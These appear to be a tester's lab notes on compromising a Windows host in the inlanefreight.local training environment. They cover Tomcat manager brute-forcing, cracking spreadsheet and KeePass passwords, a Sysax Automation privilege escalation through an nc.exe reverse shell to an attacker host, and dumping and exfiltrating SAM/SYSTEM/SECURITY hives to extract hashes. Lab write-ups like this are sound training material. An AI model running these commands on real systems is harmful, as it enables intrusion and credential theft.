# Nmap scans
- light ![[images/Pasted image 20260701203858.png]]
- create `ports.txt` ![[images/Pasted image 20260701203924.png]]
- detailed ![[images/Pasted image 20260702134339.png]]
# Port 445 (SMB)
- shares ![[images/Pasted image 20260702154307.png]]
- users > nothing
- rid-brute![[images/Pasted image 20260702154349.png]]
---
# Port 8080 (http; tomcat 10.0.21)
- visit page ![[images/Pasted image 20260702191316.png]]
## fuzzing
- run `dirbuster`
```bash
gobuster dir -u http://172.16.8.50:8080/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
```
![[images/Pasted image 20260702191828.png]]
- run `feroxbuster` ![[images/Pasted image 20260702204143.png]]
- `/manager` ![[images/Pasted image 20260702191446.png]]
## `mgr_brute.py`
- run `mgr_brute.py` > nothing
```bash
python3 mgr_brute.py -U http://ms01.inlanefreight.local:8080/ -P /manager/ -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
```
![[images/Pasted image 20260702205648.png]]
## msf module
- run msf `scanner/http/tomcat_mgr_login` > nothing ![[images/Pasted image 20260702202709.png]]
---
# shell as `backupadm`
- `whoami /all` after `evil-winrm` access ![[images/Pasted image 20260702215222.png]]
- home dir is empty ![[images/Pasted image 20260702215257.png]]
- interesting files in root dir ![[images/Pasted image 20260702215311.png]]
- download `.xlsx` and `.kdbx` ![[images/Pasted image 20260702215453.png]]
- `unattend.xml` in `\panther\` ![[images/Pasted image 20260702215349.png]]
## review exfiltrated goodies
- multiple goodies to review ![[images/Pasted image 20260702215506.png]]
- `unattend.xml` has creds for `ilfserveradm`
- `.xlsx` is password protected > we can do an `office2john` and crack ![[images/Pasted image 20260702215755.png]]
```bash
office2john budget_data.xlsx | tee budget.hash
john budget.hash -wordlist=/opt/rockyou.txt
```
![[images/Pasted image 20260703112009.png]] ![[images/Pasted image 20260703112122.png]]
- not seeing anything of use in this `.xlsx`![[images/Pasted image 20260703112701.png]]
- process the `.kdbx`
```bash
keepass2john passcodes.kdbx > keepass.hash
john keepass.hash -wordlist=/opt/rockyou.txt
```
![[images/Pasted image 20260703113029.png]]
- open with `kpcli` or `keepassxc` which has a GUI
- creds for Administrator, mssql, and Michael321 ![[images/Pasted image 20260703113631.png]]
## confirm creds
- creds for Administrator, mssql, and Michael321 do not work on MS01
- creds for `ilfserveradm` work on MS01 smb and rdp but not winrm
---
# RDP as `ilfserveradm`
## Initial Enum
- `whoami /all` ![[images/Pasted image 20260703114529.png]]
- not much in home dir ![[images/Pasted image 20260703114549.png]]
- networking ![[images/Pasted image 20260703114840.png]]
- local user and administrators ![[images/Pasted image 20260703115520.png]]
## Enum Installed Apps
- `\Program Files`![[images/Pasted image 20260703114716.png]]
- `\Program Files (x86)` ![[images/Pasted image 20260703114736.png]]
- `sysaxautomation` is non-default
- looks like ver.6.9.0 is vulnerable ![[images/Pasted image 20260703122158.png]]
- list installed programs
```powershell
Get-WmiObject -Class Win32_Product | select Name, Version
```
![[images/Pasted image 20260703122358.png]]
- check scheduled tasks
```powershell
Get-ScheduledTask | select TaskName,State
```
![[images/Pasted image 20260703122406.png]]
### `sysaxautomation`
#### enumerate access
- run `icacls` on folder ![[images/Pasted image 20260703115759.png]]
- move `Get-ServiceACL.ps1`
```powershell
certutil.exe -urlcache -split -f http://172.16.8.120:9001/Get-ServiceACL.ps1 c:\programdata\Get-ServiceACL.ps1
```
![[images/Pasted image 20260703121531.png]]
- inspect ACLs for `syaxautomation`
```powershell
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
. .\Get-ServiceACL.ps1
"sysaxschedscp" | Get-ServiceAcl | select -ExpandProperty Access
```
- having issues ![[images/Pasted image 20260703121908.png]]
- use `Get-Acl`
```powershell
(Get-Acl -Path "C:\Program Files (x86)\sysaxautomation\sysaxftp.exe").Access | Format-Table IdentityReference, FileSystemRights, AccessControlType, IsInherited
(Get-Acl -Path "C:\Program Files (x86)\sysaxautomation\sysaxsched.exe ").Access | Format-Table IdentityReference, FileSystemRights, AccessControlType, IsInherite
```
![[images/Pasted image 20260703122952.png]]
- all users can run these programs
#### exploit
- follow steps at: [💀 Exploit for Sysax FTP Automation 6.9.0 - Privilege Escalation](https://sploitus.com/exploit?id=EDB-ID:50834)
- Move `nc.exe` to target
```powershell
certutil.exe -urlcache -split -f http://172.16.8.120:9001/nc.exe c:\programdata\nc.exe
```
![[images/Pasted image 20260703124035.png]]
- Create `shell.bat` on Kali and move to target
```cmd
c:\programdata\nc.exe 172.16.8.120 9002 -e cmd
```
![[images/Pasted image 20260703124220.png]]
```powershell
certutil.exe -urlcache -split -f http://172.16.8.120:9001/shell.bat c:\programdata\shell.bat
```
![[images/Pasted image 20260703124246.png]]
- setup listener on Kali ![[images/Pasted image 20260703124259.png]]
- Open `sysaxschedscp.exe` from `C:\Program Files (x86)\SysaxAutomation`
- Add a task to run `shell.bat` whenever a file is added to `\users\ilfserveradm\documents` and save
- Add a file to `\users\ilfserveradm\documents`
- We have a shell as `nt authority\system`![[images/Pasted image 20260703125004.png]]
---
# shell as `nt authority\system`
- cascade home dir ![[images/Pasted image 20260703125043.png]]
- look for additional flags
```powershell
Get-ChildItem -Path C:\ -Filter "flag.txt" -Recurse -ErrorAction SilentlyContinue
```
- save sam, system security hives
```cmd
reg.exe save hklm\sam C:\programdata\sam.save
reg.exe save hklm\system C:\programdata\system.save
reg.exe save hklm\security C:\programdata\security.save
```
![[images/Pasted image 20260703125405.png]]
- setup port forward on pivot for port 425 and stand up smbserver with creds on Kali
```bash
mkdir share/
sudo impacket-smbserver share -smb2support share/ -user test -password test
```
![[images/Pasted image 20260703125750.png]]
- exfil hives back to Kali
```cmd
net use n: \\172.16.8.120\share /user:test test #mount share
move sam.save n:\
move system.save n:\
move security.save n:\
```
![[images/Pasted image 20260703125758.png]]
- confirm ![[images/Pasted image 20260703125819.png]]
- extract hashes
```bash
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | tee ../MS01.hashes
```
![[images/Pasted image 20260703130337.png]]
- save to file `MS01.hashes`
- looks like we have a plaintext password for `inlanefreight.local/mssqladm`
- confirmed to work on DC01 over smb